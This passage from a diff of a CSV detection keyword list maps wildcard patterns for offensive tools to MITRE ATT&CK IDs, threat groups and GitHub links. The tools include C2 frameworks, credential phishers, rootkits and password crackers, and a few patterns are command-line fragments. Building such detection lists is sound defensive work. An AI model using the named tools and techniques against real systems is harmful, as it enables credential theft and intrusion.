Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*Credentials/LSASecrets.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*Credentials/SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*CredPhisher.csproj*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*CredPhisher.exe*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Credentials/SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*CredPhisher.csproj*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*CredPhisher.exe*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*credphisher.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*cred-popper *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*CredPrompt/CredPrompt.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*cred-popper *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*CredPrompt/CredPrompt.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*creds_hunt.exe*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*CredsLeaker*","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","3","295","73","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z" "*CredsPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Credz-Plz.ps1*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*Credz-Plz-Execute.txt*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Credz-Plz.ps1*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Credz-Plz-Execute.txt*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*cribdragg3r/Alaris*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*crimeware*/zeus.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*crisis_monitor start*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisis_monitor stop*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisprss/PrintSpoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" -"*crk_get_key1*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_get_key2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_max_keys_per_crypt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_methods.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_password_loop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Cronos Rootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" -"*CronosDebugger.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" -"*CronosRootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*crk_get_key1*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_get_key2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_max_keys_per_crypt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_methods.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_password_loop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Cronos Rootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*CronosDebugger.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*CronosRootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*CrossC2 beacon*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*crossc2 dyn load*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" @@ -8911,7 +9059,7 @@ "*CrossC2Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*CrossC2MemScriptEng*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Script*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*CrossLinked*","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","915","155","2023-10-03T13:00:54Z","2019-05-16T13:36:36Z" +"*CrossLinked*","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","915","156","2023-10-03T13:00:54Z","2019-05-16T13:36:36Z" "*CrossNet.exe*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 